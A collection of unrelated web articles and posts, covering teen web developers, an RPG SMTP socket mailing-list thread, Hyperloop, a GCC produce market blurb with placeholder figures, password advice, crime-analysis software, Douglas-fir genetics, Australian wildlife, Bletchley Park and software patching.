Many coders are purists and avoid HTML visual creation tools like Hot Dog Pro. Freeman is no exception, as he prefers to write HTML directly in ASCII text. Adobe PhotoShop is one of the few tools used by Freeman. Its extensive editing and image manipulation functions seamlessly integrate HTML text and graphics. As he develops his code, he loads it directly into Netscape to see the results. Developing under Windows 95 is simpler than Windows 3.x, because of Windows 95's built-in Winsock function. Older versions of Windows require an external Winsock program such as Trumpet to be loaded before Netscape can operate.
Freeman is exposed to CGI scripts as part of his volunteer work with the DCN Web team. These scripts differ from HTML code in several ways. Unlike HTML, which executes on the client machine, CGI scripts execute directly on the server. Running CGI scripts requires the approval of the server administrator. Because they run directly on the server, they are potential security and system integrity risks. "CGI scripts are a lot more complicated," noted Freeman. Most are written in the Perl script language under UNIX, to perform interactive functions. Search engines, news retrieval and counters are common CGI applications.
Burnout is an issue on Freeman's mind. "HTML coders get burned out after awhile, like comics artists," he said. "It will be a sad day when the author of Dilbert burns out."
When asked about continuing with HTML coding, Freeman said, "It's oversaturated now. Everyone and their dog is providing Web service." Freeman wants a career outside the computer field, where his computer skills will be an asset to him. He is uncertain of his direction right now, but believes it will not be Web publishing.
Mark Baysinger is another Web page author and self-described computer freak, who graduated from Davis High School last year. He will be attending the University of California at San Diego this fall as a computer science major. Baysinger also studied under Janet Meizel at Davis High School. His programming career began early when his father brought home a Commodore personal computer. This machine was quickly outgrown, and gave way to an IBM-compatible machine.
Baysinger has done a lot of CGI script programming. One of his projects was the guest book for the Davis High School Web site. Another was an order form for a comic book vendor on DVM. He participated when Davis High School placed their newspaper, The Hub, online. His CGI scripts, written in Perl, took the news text files and formatted them with a table of contents.
PhotoShop is the artist's tool favored by Baysinger. He creates images with other tools then imports them into PhotoShop for touchup and text overlays. PhotoShop's GIF plug-in module exports the completed graphic to a GIF file as a transparent image. The "multiple layers" function in PhotoShop is important to him. He uses it to make drop-shadow effects.
For Baysinger, interactive screens are the most exciting part of Web page design. He said, "If you look at the Davis High School online newspaper and click on a page, it pulls the articles for that page. Clicking on an article formats it for the screen right there as you're looking at it."
Today, Baysinger is creating Web pages for DVM. He is uncertain about doing this in the future. "The people at DVM want me to continue," he said. "I don't know how much free time I'll have." His busy college schedule will probably limit the amount of time available for extra activities. Living out of town in San Diego won't pose a problem. He can still perform his Web page maintenance across the Internet.
Burnout is not a factor for Baysinger. There is always a new technology out there for him to examine and learn. The constantly changing face of the computer industry helps keep burnout to a minimum. "It's really hard to predict the future," noted Baysinger. "If we could, we'd all be Bill Gates."
Young entrepreneurs like Freeman and Baysinger are tomorrow's movers and shakers. They, and others like them, have taken technical skills and transformed them into the beginnings of promising careers. | <urn:uuid:a10954c5-8e4b-4a72-8b06-f8fe7e81b38d> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Young-Entrepreneurs-Cash-in-on-the.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00550-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966469 | 1,656 | 2.96875 | 3 |
The idea is e-mail is this: If you abort the e-mail send (disconnect
before the session is complete) the e-mail is considered to be "aborted"
and not sent.
So you need to send the whole message, and successfully receive the
response that confirms that the server has sent it.
I would not use a sleep() to give it time to send the response, however.
I would just call recv() until you've received the whole thing. That
way, it takes only the time it needs to take to send the response...
On 10/16/2012 8:16 AM, Victor Hunt wrote:
I share your feeling on the sleep() call. The program is fairly straight
forward. It opens a socket to our SMTP server. It then loads the various
SMTP commands into a string (one at a time) and runs a subroutine that does
the send() and recv() calls separated by a sleep() call.
I've been playing with the subroutine a bit. The data from the recv() call,
if any is even returned, is not used by the program. I commented out both
the sleep() and recv() calls. Nothing else was changed. The program no
longer sends an email. After uncommenting out the sleep() call, the email
is sent again.
This was late in the day and I didn't have time to do any debuging, which I
will do this morning to see if the send() call is failing for some reason.
Do the send() and recv() calls need to be used together? Can I do a send()
and never a recv()? At least as far as SMTP goes?
On Mon, Oct 15, 2012 at 4:57 PM, Scott Klement
It's hard to see how a sleep() call would help in sending an e-mail? I
could see using delays like this if you're using QtmmSendMail(), since
that program hands the file off to a background job which may take a
moment to handle the file
But if you're coding an SMTP client (i.e. coding your own SMTP routine
with the socket API) this should be a non-issue? Unless something
strange is going on?
On 10/15/2012 1:45 PM, Victor Hunt wrote:
I've run across an RPG program that uses socket APIs to send an email.
the socket is setup and opened, the program uses a subroutine to do all
send/receive functions. Just after the send, the subroutine runs the
API with a parameter of 1 second. It appears the original intent was to
give the email server and/or network time to produce/deliver a response
before the receive API runs. Does anyone think this built in delay is
really necessary? Depending on what is being sent, this program can run
a very long time with these roughly 1 second delays. Also, the program
doesn't do anything with the received data collected after the send API.
it really necessary to do a receive after a send? Seems I can tighten
up a bit.
This is the Midrange Systems Technical Discussion (MIDRANGE-L) mailing list
To post a message email: MIDRANGE-L@xxxxxxxxxxxx
To subscribe, unsubscribe, or change list options,
or email: MIDRANGE-L-request@xxxxxxxxxxxx
Before posting, please take a moment to review the archives | <urn:uuid:0565d13f-d440-4846-b42c-3de55854aab5> | CC-MAIN-2017-04 | http://archive.midrange.com/midrange-l/201210/msg00671.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00184-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917212 | 746 | 2.65625 | 3 |
Instead of boarding a plane for your next business trip, ever think you might make the journey inside a solar-powered, car-sized aluminum pod shooting through a steel tube? That's the vision of Elon Musk, chief executive of electric car maker Tesla Motors and SpaceX.
Instead of boarding a plane for your next business trip, ever think you might make the journey inside a solar-powered, car-sized aluminum pod shooting through a steel tube?
And you might get from Los Angeles to San Francisco in just 30 minutes?
That's the vision of Elon Musk, chief executive of electric car maker Tesla Motors and SpaceX, which has run two successful missions contracted by NASA to deliver scientific experiments and supplies to astronauts on the International Space Station.
If most people started talking about high-speed transportation inside a large tube, few would pay attention. Musk, however, is an entrepreneur who has made big things happen, such as being the first company to build and run essentially a commercial space taxi for NASA.
Musk is behind the idea for what he's calling Hyperloop, an elevated, city-to-city transportation system that would travel at speeds of more than 700 mph.
"Short of figuring out real teleportation, which would of course be awesome (someone please do this), the only option for super fast travel is to build a tube...," Musk wrote in a post on the SpaceX site. "Hyperloop is a new mode of transport... both fast and inexpensive for people and goods. Hyperloop is also unique in that it is an open design concept, similar to Linux. Feedback is desired from the community that can help advance the Hyperloop design and bring it from concept to reality."
In Musk's plan, Hyperloop consists of a low-pressure tube with capsules that hold up to 28 passengers and shoot through the tubes at either low or high speeds. The capsules, or pods, are supported on "a cushion of air" created by pressurized air and aerodynamic lift. Acceleration would be created by a powerful fan at the front of the pod sucking air in the front and expelling it at the rear.
Passengers would be able to enter and exit the capsules at either end or from various branches along the tube.
The initial plan was set up for a system that runs from Los Angeles to San Francisco, with capsules departing as often as every 30 seconds. According to Musk's plan that could transport 7.4 million each way annually.
So is there any real chance of one day traveling from L.A. to San Francisco, or Boston to Washington D.C., inside a pod shooting through a tube?
Well, some industry analysts say, Why not?
"I like it. It's bold, yet workable," said Dan Olds, an analyst with The Gabriel Consulting Group. "There will be a lot of special interests who will work to snuff it out, but it's a good idea and deserves more exploration. It could make business travel more affordable, and also allow people to live farther away from their jobs."
He added that for frequent business travelers, this could quickly get them from city to city without a trip to the airport.
"The other consideration is that much of the energy used could be harvested from solar cells lining the outside of the tube," said Olds. "The science behind it is sound. Assuming it can be built, it has the potential to move more people faster than any alternative -- and at a lower cost as well."
Zeus Kerravala, an analyst with ZK Research, said once the project gets beyond the funding and building stage, there are some strong positives to the idea.
"I think a faster mode of transport would be well received," he added, calling Musk "futuristic." "Frankly, I think it would great. Anything to save on travel time would be welcomed. I think initially there would be some concern, but once people started using it, I'm sure it would be mainstream."
This article, Hyperloop tube travel may be more than a pipe dream, was originally published at Computerworld.com.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "Hyperloop tube travel may be more than a pipe dream" was originally published by Computerworld. | <urn:uuid:ae2ec1ff-5505-4205-83a0-219fb2179ff1> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2169029/data-center/hyperloop-tube-travel-may-be-more-than-a-pipe-dream.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00000-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966281 | 940 | 3.21875 | 3 |
The total food consumption in GCC is expected to reach 52.3 million metric ton by 2021. The fruit market in the region reached XXX thousand metric tons in 2016, which increased at a CAGR of X.XX% from 2010 to 2016 and is expected to grow at XX.XX% YoY, till 2021. Vegetable market in GCC reached XXX thousand metric tons in 2016, which increased at a CAGR of X.XX% from 2010 to 2016 and is expected to grow at a CAGR of XX.XX% till 2021. The increase in consumption of fruits and vegetables is attributed to the growing expatriate population and the economic prosperity of the region. Among the GCC countries, UAE has the highest expatiate population; about 85.5% are non-nationals of UAE. The same phenomenon is seen in all the GCC countries.
Conditions in the GCC countries are unfavorable for the cultivation of most fruits and vegetables. Out of the total area available, only about 1.7% is arable. Due to this, the domestic production levels are low, and most of the consumption is met by imports from various countries. Due to the growing consumption of fruits and vegetables the GCC countries tried to boost the agricultural output by increasing productivity so that they could be self–sufficient. The GCC countries could not continue with this level of production due to the scarcity of water resources, which in-turn increased these countries’ reliance on import of fruits and vegetables. Due to the water issue, the GCC countries’ domestic production will never be able satisfy its domestic consumption.
Signing of the GAFTA and other free trade agreements will open up different avenues of trade and procurement. GAFTA is expected to boost, both intra GCC, as well as, intra MENA trade. The governments of the GCC countries have undertaken several food security initiatives in the form of framing policies that encourage private investments in the agricultural sector. The governments started implementation of policies, which phase out domestic production of plants that need high amounts of water. This makes GCC the perfect market for exporters of fruits and vegetables. After recent land privatization law, passed by the African government, most of the governments of the GCC countries have invested in obtaining land in Africa and producing fruits and vegetables for the country. Many private organizations are trying to follow the same model, as the demand for fruits and vegetables is high in the GCC countries.
The agricultural market in Iran is segmented by type of products into fruits and vegetables. These are sub-segmented into onions, potatoes, tomatoes, garlic, cauliflower, cucumber, cabbage, beans, eggplant, lemons, apples, bananas, oranges, grapes, strawberry, watermelon, grapefruit, dates, and olives.
About the Market | <urn:uuid:2e40c2f1-b695-4c85-b486-f4da00d25c83> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/analysis-of-the-fruits-and-vegetables-sector-in-gcc-countries-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00000-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935677 | 563 | 2.65625 | 3 |
There's some speculation among experts. Why Facebook? Has Facebook become a keystone from which to launch and steal all of an individual's passwords (i.e. banking and commerce sites)? Once you have Facebook, can you then compromise the primary e-mail account and everything else along with it?
Let's take Finland as an example. There are over one million estimated Facebook accounts and there are only 5.3 million people living in Finland. The regional network has over 544,000 members. Anything that size will be a target for scammers.
Wherever good people go, miscreants will follow.
So of course it's an excellent policy to maintain complex passwords that are unique to each site. Right?
Here's an idea. Write down your passwords. Seriously.
And once you write them down, put them in your wallet. Think about it. What else do you carry in your wallet? That's right, your bank cards. And your bank cards contain your account name and account number.
That's kind of like your online account names and passwords.
Only this is the key — It's a two part password. Because your account name and bank card number also requires your PIN.
So take a look at this screenshot. What do you see?
Passwords on a Post-it, only examples of course… non-dictionary ones at that.
Keep another three common characters in your head, and you'll have complex 10 character passwords. And you can insert those extra characters in the front, middle, or end.
What do we mean? It's like this.
The first three characters in this example are based on the website, "aMA" represents Amazon.com. And it can be written several ways, such as "AMa" or "aMa" or "AMA", etc. A good method should be easy for you to remember.
The next (or other) part, "2242" as in our example, should be something completely random. This is the part that you really need to write down and keep safe so that you don't forget it.
And then you should use a method to add three more characters (your "PIN") to every password. Something such as "35!" So the full password then becomes "aMA224235!" or "aMA35!2242" or "35!aMA2242".
Our other example would be "gMA35N135!".
Your PIN should never be written down, keep that bit of information in your head. Just like your bank card's PIN.
Note that our example does not include an e-mail address on the Post-it.
What happens if your wallet is stolen? You call the bank and cancel your cards.
And what about your Post-it? If it doesn't include your e-mail address or your PIN, you can reset your passwords in a timely fashion on a new piece of paper. You're good to go.
Using this methodology, you can maintain complex and unique passwords, and still have something handy for when you forget them. Because we all do forget stuff from time to time.
And if you're phished on one site, such as Facebook, your other accounts aren't sharing the same password.
Oh, one last piece of advice.
Don't put the Post-it on your monitor! And not on the underside of your keyboard either… everyone's familiar with that location too. | <urn:uuid:c1f55793-9114-41cb-b2d5-0ce15afe133d> | CC-MAIN-2017-04 | https://www.f-secure.com/weblog/archives/00001691.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00120-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947002 | 712 | 2.53125 | 3 |
Wei X.-X.,CAS Institute of Botany |
Wei X.-X.,Forest Research Center and Institute for Systems and Integrative Biology |
Beaulieu J.,Forest Research Center and Institute for Systems and Integrative Biology |
Beaulieu J.,Natural Resources Canada |
And 5 more authors.
Tree Genetics and Genomes | Year: 2011
The contemporary genetic structure of species offers key imprints of how organisms responded to past geological and climatic events, which have played a crucial role in shaping the current geographical distribution of north-temperate organisms. In this study, range-wide patterns of genetic variation were examined in Douglas-fir (Pseudotsuga menziesii), a dominant forest tree species distributed from Mexico to British Columbia in western North America. Two organelle DNA markers with contrasting modes of inheritance were genotyped for 613 individuals from 44 populations. Two mitotypes and 42 chlorotypes were recovered in this survey. Both genomes showed significant population subdivision, indicative of limited gene flow through seeds and pollen. Three distinct cpDNA lineages corresponding to the Pacific Coast, the Rocky Mountains, and Mexico were observed. The split time of the two lineages from the Rockies lineage was dated back to 8.5 million years (Ma). The most recent common ancestors of Mexican and coastal populations were estimated at 3.2 and 4.8 Ma, respectively. The northern populations of once glaciated regions were characterized by a high level of genetic diversity, indicating a large zone of contact between ancestral lineages. A possible northern refugium was also inferred. The Mexican lineage, which appeared established by southward migration from the Rockies lineage, was characterized by the lowest genetic diversity but highest population differentiation. These results suggest that the effects of Quaternary climatic oscillations on the population dynamics and genetic diversity of Douglas-fir varied substantially across the latitudinal section. The results emphasize the pressing need for the conservation of Mexican Douglas-fir. © 2011 Springer-Verlag. Source | <urn:uuid:57f9faba-d025-410f-abb8-ff21406efe25> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/forest-research-center-and-institute-for-systems-and-integrative-biology-1735004/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00238-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937086 | 409 | 3.109375 | 3 |
The neural network was derived from analysis of the most successful detectives in Chicago. These six detectives were at the top of the department in terms of arrests made and cases closed, Muscarello said.
"We picked their brains for the type of patterns they were looking for. We looked at what they did, and found there was no one way they did their work," he said. "Some of them concentrated on the victim, some on the time of day, but they all concentrated on something, and it helped them solve the crime. We picked out the best data features to look at and tried to normalize them."
What he means by "normalize" is programming the system to look for patterns the way the human brain does. Take height, a common data element, for instance.
Eyewitness accounts are notoriously inaccurate, so trying to be too detailed can lead a detective in the wrong direction. Muscarello said in terms of height, people think in terms of tall, average and short -- and that's how it will be programmed into the network.
"The victim has very little time to see the offender," Muscarello said. "Even in the best of circumstances, people are usually off when they try to estimate someone's height unless they're about your height."
One of the six detectives focused heavily on getaway vehicles. Like the height of suspects, Muscarello said, this data is "normalized" when programmed into the system. A victim might describe a getaway vehicle as a navy blue Toyota Corolla, but focusing just on that type of vehicle might lead an investigator to a dead end.
"That's too exact," Muscarello said.
A good investigator would focus on a dark vehicle, probably foreign, maybe Japanese. That's how the system is programmed to recognize a cluster or a pattern. The detective can find such a cluster by clicking on a drop-down box on the computer or typing in a query.
"The way we built this is the network will know the important things to look at, and it would also learn the less important things," Muscarello said. "So on its own it would do a pass with what it learned was important. What we also did is give the computer the capability so that the interface allowed you to either access all of the pre-determined case clusters [that the system is programmed to recognize], or enter your new data select things you were interested in looking for."
The department will test linking the CSSCP to the Citizen Law Enforcement Analysis and Reporting (CLEAR) system, the state's crime data warehouse.
Both resources could help police solve crimes in two direct ways. First, by locating clusters of data elements that illustrate a clear pattern and point to a specific suspect(s); and second, by having the CSSCP link the detainee to previous crimes or even cold cases.
With a suspect in custody, police can examine how the crime was conducted, then sift through the CSSCP and try to match the characteristics of the latest crime with ones from the past, Maris said.
When they find a pattern, they can interrogate the suspect further with the evidence.
"'We caught you for this burglary; did you do these other six burglaries, too? You used the same MO, the same characteristics,'" Maris explained as an example of tying a known suspect to previous cases.
Most convicted criminals that are incarcerated continue committing crimes once released, so going back and looking at cold cases or even solved ones can lead to new arrests.
"We know that most crimes are committed by a few criminals, and we just aren't closing out that many cases," Muscarello said.
He's spent the last decade trying to fix that. | <urn:uuid:d739a060-bfd5-4dc4-8c67-55f7384a7503> | CC-MAIN-2017-04 | http://www.govtech.com/e-government/Brain-Power.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00542-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.973172 | 763 | 2.828125 | 3 |
Palmer C.M.,Northern Territory
Environmental Entomology | Year: 2010
Arid and semiarid environments are characterized by highly unpredictable and 'pulsed'availability of essential biological resources. The 'boom and bust'response of many vertebrates is commonly invoked for invertebrates and especially insects. This perception of the Australian arid zone is exacerbated by the lack of long-term surveys of insects identified at high levels of taxonomic resolution. From an 18 mo continuous survey of insects in central Australia I determine the phenology of many insect taxa, and clarify which climatic variables most influenced the activity of these taxa. Total abundance and taxon richness were higher in the warmer months and lower in the cooler months. Minimum temperature, rainfall during the survey month, and rainfall during the previous month had significant effects on phenology, demonstrating that there is pronounced and predictable activity of many species in the absence of rain, although rainfall has a marked effect on the activity of some species. Other species were more active or only active in the coolest months. These findings have implications for the most productive time for surveys in the Australian arid zone, the availability of insects as prey or pollinators, and for the potential effects of climate change. © 2010 Entomological Society of America. Source
News Article | November 4, 2015
Scientists from Queensland University of Technology recently discovered a unique genetic code in an Australian tobacco plant which may someday pave way for food production in space. Professor Peter Waterhouse said that they first traced the history of the tobacco plant Pitjuri or Nicotiana benthamiana. The Pitjuri is a "laboratory rat" plant which is often used to test vaccines and viruses. Waterhouse discovered that the plant adapted over-sized seeds as well as rapid reproduction and sacrificed its immune system. To find out how the adaptation works, Waterhouse and his colleagues mapped the gene fault which switched off the Pitjuri's immune system. Their work is issued in the journal Nature Plants. After sequencing the plant's genome and looking into historical records, the team determined that the Pitjuri originated from the harsh desert area near the Northern Territory border and Western Australia. This enabled the tobacco plant to survive and adapt to the hostile environmental conditions. "You'd think it wouldn't be a good thing to have lost your immune system and yet the plant has survived for this length of time and we wondered why," said Waterhouse. He described the process as this: for the plant to survive, it had to germinate and grow very quickly, and place its seed so that when there is rainfall, it can go through its life cycle as fast as it can. This ability is more beneficial to the plant than being able to defend itself from non-existent pathogens in the area, he said. Waterhouse said that the plant's harsh living conditions are almost as hostile as the disease-free environment in space. Researchers believe that their findings could have great impact on biotechnology research and space colonization. Because the team narrowed down the exact gene responsible for the Pitjuri's unique abilities, their next step is to replicate the gene fault in other plants in hopes that they could significantly increase yields on seed crops. Waterhouse explained that it would not be difficult now to test other plant species and knock out the same gene to figure out if they could also produce the same special properties that the Pitjuri has. "It will be interesting to see what a plant will do if you give it this bigger boost of energy to spend in any way it likes," added Waterhouse.
Researchers and Traditional Owners traversed the spectacular reaches of the Prince Regent, Hunter and Roe rivers at night to discover that croc numbers have trebled from 30 years ago when hunting had decimated their numbers. They counted the crocodiles by torchlight, the beam of torchlight reflecting off the crocodiles' eyes gleaming from dark waters. The surveys revealed a healthy croc population, comparable to crocodile numbers in the crocodile-rich waters of the Northern Territory, according to WA Department of Parks and Wildlife (DPAW) scientist Andrew Halford. However, the increase in crocodile numbers combined with warming waters are pushing crocodile populations further south to tourist areas such as Broome, he says, thereby posing new challenges for conservation managers seeking to keep people safe. "We've got a situation where there will be more and more human and crocodile interaction and that's clearly a management issue that we need to keep an eye on," Dr Halford says. "In the news the other day we had a couple of big crocs at Cable Beach that would have posed a serious threat to beachgoers so they were removed and taken to a crocodile park." Some crocodiles in tourist locations in remote areas have lost their fear of humans and pose an elevated risk to visitors, Dr Halford says. Such crocodiles are usually killed, while crocodiles in more accessible areas are translocated away from human populations—a difficult, dangerous and expensive operation. As part of the surveys the team counted the crocs from a five-metre aluminium boat specially adapted for crocodile surveys, with higher-than-standard safety rails and non-reflective black paint on the hull to prevent spotlight reflections. The team felt privileged to work in such a spectacular setting, Dr Halford says, though there were certain encounters that left their hearts racing. "Sometimes we'd be in these little creeks at night time in the middle of nowhere and you'd see a really large croc," he says. "Usually they just disappear but sometimes, when they are not too happy you're there, they'll come towards you at quite a rate." The Dambimangari, Willingin and Wanambal Gaambera Traditional Owners helped conduct the surveys as part of a bigger plan to enable traditional owners to take over the monitoring of plants and animals in their own country.
News Article | November 30, 2015
Bushfires have been ravaging certain areas of South Australia, with two people confirmed dead, 90 victims in the hospital and 87 homes burnt to ashes. More than 27,000 head of livestock have also perished in the bushfires. One man, however, was able to save his house from destruction through quick wits in using smart home technology. Charles Darwin University vice chancellor Professor Simon Maddocks was in Darwin in the Northern Territory of Australia when he was informed of the bushfire ravaging the nearby state. Named the Pinery Fire, the fire was on its way to engulfing Maddocks' property in South Australia, and he would not be able to get there in time to save it as he was 3,000 kilometers away. Using the property's home security, the agricultural scientist watched as the fire approached. Maddocks, however, was not entirely helpless at all. Using an app on his smartphone, he activated the irrigation sprinklers at his property. While his quick thinking was not able to save his crops, which were destroyed by the fire, his farmhouse and animals were able to escape harm. The smart sprinklers played its part in saving the farmhouse and animals, with Maddocks also attributing the rescue to his swift-acting neighbors. "The fire came up all around the house, but my ability to turn on irrigation systems from my phone in Darwin and the fact that I had neighbours patrolling with fire units, we're lucky we got away with a house," Maddocks said. "To suddenly watch your 15 years of labour of love just go to pot in front of your eyes is a bit surreal," Maddocks added, stating that he felt so helpless as he was four-and-a-half hours away when the events unfolded. Maddocks revealed that he will begin to rebuild the property immediately.
So why do they do it and what do they want? Flies are one of the most diverse insect orders, with more than 150,000 species described worldwide in more than 150 different insect families. In Australia, entomologists (scientists who study insects) estimate there are more than 30,000 species of fly, and yet only 7,700 species have been described. There are two main types of fly: the Nematocera (which includes mosquitoes and non-biting crane flies) and the Brachycera (which includes house flies, fruit flies, and horse flies). In Australia, there is only one type of fly that's attracted to us, rather than our blood: the bush fly (Musca vetustissima, Diptera: Muscidae), which is a non-biting fly and close relative of the house fly (Musca domestica). These flies are after the proteins, carbohydrates, salts, and sugars naturally present on your skin. All the other flies around you are probably after your blood, and that includes mosquitoes and horse flies. And yes, unfortunately some people are more attractive to mosquitoes than others. Although mosquitoes and other blood-feeding insects are attracted to the carbon dioxide we exhale, we know the insect sensory system also helps find exposed skin. Since the skin near our faces is often exposed, that's one reason flies are always buzzing around your face and hands. In the mosquito, the proboscis is sharp and needle-like; in the deer fly (also known as the horse fly, or march fly in Australia), it is a large, wide spike. This reflects the different feeding styles found in flies: mosquitoes use a hypodermic needle approach, and are so selective about where they bite research has shown they can actually find capillaries underneath the skin. As most people know, these bites can be very itchy and in rare cases the proteins transferred during a mosquito bite can cause anaphylactic shock. Horse flies use a "slash and suck" approach, where they cut the skin and then lap up the blood that comes out. These bites are my least favourite of any insect. Biting midges, also known as sandflies in Australia, are blood-feeding flies (Diptera: Ceratopogonidae), and are known vectors of lesser human pathogens and major veterinary pathogens in livestock. Their bites are also intensely itchy. Fruit flies and house flies use a slightly different method: their mouthparts are like sponges, and they regurgitate a mixture of digestive enzymes onto the surface they're feeding on and then lap up the resulting liquid. Although they are irritating, they don't bite humans. Along for the ride The biggest problem with fly bites isn't so much that the injury is painful or irritating, it's the pathogens the insect can transmit through their bite. In order for a vector-borne disease to spread, three things need to be present: For some diseases, such as dengue fever, in Australia we have the mosquito but generally don't have the virus. Outbreaks of dengue occur when someone brings the dengue virus into the country, and then the mosquitoes that are already here can spread the disease. When you look at the number of notifications for dengue virus infection, you can see that Queensland has the highest number of cases. But when you factor in the population size, how does that change? When you look at the number of notifications per 100,000 people in the population, the tropical areas of Australia (the Northern Territory, Western Australia, and Queensland) are by far the most at risk. That's because those areas are where you're most likely to have the disease, the insect that spreads the disease, and humans. How can you reduce your risk of being bit? DEET or picaridin containing topical insect repellents work best to stop mosquitoes from biting. Wristbands have been shown not to repel mosquitoes, and botanicals rarely if ever provide the same level of protection. For nuisance flies this may not matter, but for those insects that can carry human disease your best method is to remove all the standing water from around your house (to prevent eggs from developing there), and stay inside when you are able at dusk (to prevent being bit when the mosquitoes are most active). Most blood feeding flies, like mosquitoes, take opportunistic blood meals to complete their lifecycle. The blood meal is required in order for females to lay eggs. In several species of mosquito, females aren't selective and will take their blood meals from a range of vertebrates. Adult males and sometimes females feed only on nectar or pollen. In tabanids like horse flies, nectar feeding occurs frequently in both males and females. When flies land on a series of plants to feed on nectar, they spread the pollen between flowers and help fertilise the next generation of plants. As pollinators, flies perform a valuable role in the ecological community for our native plants, and are also helping farmers. Recent research from scientists in Australia has shown that non-bee pollinators, including flies, play an important role in crop pollination across the world. So next time flies flood your picnic, bushwalk or barbecue, consider that they may have helped put some of that food on your table. Explore further: Researchers investigate new suspect in West Nile deaths of pelicans | <urn:uuid:e99a00c3-beef-4895-ad3f-bef2697f9d15> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/northern-territory-972820/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00322-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964129 | 2,673 | 3.703125 | 4 |
Bletchley Park, which quietly and secretly evolved into the modern spy center GCHQ, was home to the UK’s code-breaking efforts during World War 2. Alan Turing is probably the best known of the code-breakers (he committed suicide by cyanide in 1954, probably as a result of persecution for his homosexuality). Less known, however, is the ‘Testery’ group which successfully broke the Lorenz code used with the Tunny code machine. While Enigma was based on four revolving wheels, Tunny used 12 wheels and was considered by the Nazi high command to be unbreakable.
But break it they did; and key Testery member Capt Jerry Roberts has now been honored for his work with the award of an MBE. “Speaking on Radio 5 Live,” reports the BBC, “he said he was pleased to be appointed MBE, but felt his colleagues perhaps deserved greater recognition.” Capt Roberts, now aged 92, has spent the last few years campaigning for greater recognition of what he calls the ‘four T’s’: the Testery group as a whole, Turing, Bill Tutte and Tommy Flowers.
Testery was established in 1942 under Major Ralph Tester, specifically to crack the Lorenz cipher. Capt Roberts was one of the original members. Turing is well known. Bill Tutte was the mathematician who cracked the code itself, and worked out the logical structure of the cipher machine. He died in 2002. Tommy Flowers (1905-1998) designed and built Colossus, the world’s first programmable electronic computer, in just 10 months. It became operational in February 1944. For 19 months before Colossus, the Testery group was decrypting Lorenz by hand.
By the end of the war, with Colossus, the Testery group was breaking 90% of the intercepted traffic given to them. After the war, General Dwight D. Eisenhower said that “Bletchley decrypts shortened the War by at least two years.” During this period the war was causing the death of up to 10 million people per year. It could be suggested, then, that Capt Jerry Roberts MBE was instrumental in saving the lives of 20 million people. | <urn:uuid:b6bf9ee5-9070-4f2d-a134-6db4f587b985> | CC-MAIN-2017-04 | https://www.infosecurity-magazine.com/news/bletchley-park-hero-captain-jerry-roberts-awarded/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00230-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.981762 | 465 | 2.890625 | 3 |
It’s nearly impossible to escape computer-based information in today’s high-tech society. From doctors’ offices to hardware stores, organizations and companies of all sizes record, track and transmit data electronically – making it an integral part of daily business and commerce. But with this increased dependency comes greater risk. Security failures, information exposure and privacy invasion is far greater in today’s electronic-based world. The risk of insecure data not only concerns consumers – who are wary of fraud, identity theft and privacy – but greatly concerns businesses, which can be held liable for information that is unintentionally exposed, despite a firm’s best efforts to protect such data.
Unlike paper-based storage, which requires physical access to compromise, today’s electronic files are virtually accessible anywhere in the world. Security vulnerabilities in software applications, electronic files or computer operating systems can be quickly exploited to inflict serious damage: accessing private or secure data; stealing passwords or identities; performing unauthorized financial transactions; examining personal health records; or capturing sensitive network data.
The majority of software vulnerabilities today are found in Microsoft-based products – primarily because they are the most widely used software on the planet. And while Microsoft releases more than just vulnerability fixes on Patch Day – also providing software updates that add new features to existing products – the security patches almost always grab the most attention, because they expose what are dangerous weaknesses in widely used software products.
Patch and go
So what’s all the fuss? Just install the security patches and you’re safe, right? Unfortunately, no. As IT professionals will attest, it can be extremely difficult to test and apply the necessary patches to every vulnerable computer within an enterprise before exploits become public. Compounding the matter, some patches can actually interfere with, or “break” existing software applications, adding to the time it takes to determine which patches can be applied and which need to be tested within a given organization’s network.
Moreover, many still handle patch management manually, physically going to every computer on the network to download and install patches. For enterprises with hundreds or thousands of PCs, including mobile workers and remote offices, manually applying patches has proven to be an impossible task. As a result, network administrators fall behind, and critical patches often aren’t applied as quickly as needed.
No time to lose
Moments after the news of a new patch release, malware-writers start identifying security vulnerabilities and writing code to take advantage of flaws. For example, the patches for the RPC/DCOM flaws were released just 20 days prior to the onslaught of the Blaster worm attack in 2003.
But even a short 20 days can seem long when compared to today’s zero-day exploits. The disclosure of the Windows Metafile (WMF) flaws in December 2005 immediately led to the discovery of over 80 active exploits. By the time Microsoft released a patch ten days later, enterprises were already at high risk of infection and there was no time to spare in getting the necessary patches in place.
What’s a company to do?
